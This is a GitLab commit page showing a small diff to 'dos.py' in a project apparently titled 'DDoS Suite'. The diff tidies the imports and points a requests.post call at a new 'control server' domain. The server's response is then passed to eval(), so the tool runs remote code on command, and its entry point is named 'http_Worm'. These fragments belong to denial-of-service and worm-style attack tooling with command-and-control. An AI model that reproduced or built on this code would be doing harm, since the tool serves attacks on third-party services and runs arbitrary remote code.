Skip to content
GitLab
Explore
Sign in
Register
Primary navigation
Search or go to…
Project
D
DDoS Suite
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Wiki
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Package registry
Container Registry
Model registry
Operate
Environments
Terraform modules
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Issue analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
Hemanth VSR
DDoS Suite
Commits
7612e70b
Commit
7612e70b
authored
4 months ago
by
Hemanth VSR
Browse files
Options
Downloads
Patches
Plain Diff
Update file dos.py
parent
988e751d
No related branches found
Branches containing commit
No related tags found
No related merge requests found
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
dos.py
+18
-20
18 additions, 20 deletions
dos.py
with
18 additions
and
20 deletions
dos.py
+
18
−
20
View file @
7612e70b
...
...
@@ -2,24 +2,22 @@
#!/usr/bin/env python3
try
:
import
requests
import
threading
import
random
from
colorama
import
Fore
,
Back
,
Style
import
time
import
bs4
import
os
from
bs4
import
BeautifulSoup
import
subprocess
import
socket
import
json
import
sys
import
ast
import
argparse
except
ImportError
as
error
:
print
(
"
Import Error : {}
"
.
format
(
error
))
exit
()
import
requests
import
threading
import
random
from
colorama
import
Fore
,
Back
,
Style
import
time
import
bs4
import
os
from
bs4
import
BeautifulSoup
import
subprocess
import
socket
import
json
import
sys
import
ast
import
argparse
response
=
[]
...
...
@@ -707,7 +705,7 @@ class DoSuiteActivated():
}
try
:
r
=
requests
.
post
(
'
https://dos.hemanth
.me
'
,
data
=
json
.
dumps
(
data
))
r
=
requests
.
post
(
'
https://dos.hemanth
vsr.in
'
,
data
=
json
.
dumps
(
data
))
data
=
eval
(
r
.
text
)
except
:
print
(
f
"
{
self
.
bold
}{
self
.
white
}
[
{
self
.
red
}
Alert
{
self
.
white
}
]: Sorry! the control server is down. Contact developers to know the reason
{
self
.
reset
}
"
)
...
...
@@ -813,4 +811,4 @@ if __name__ == "__main__":
except
Exception
as
e
:
http_Worm
=
DoSuiteActivated
(
"
Sync
"
,
"
Zipher
"
,
"
Ciron
"
)
http_Worm
.
have_control
()
\ No newline at end of file
http_Worm
.
have_control
()
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment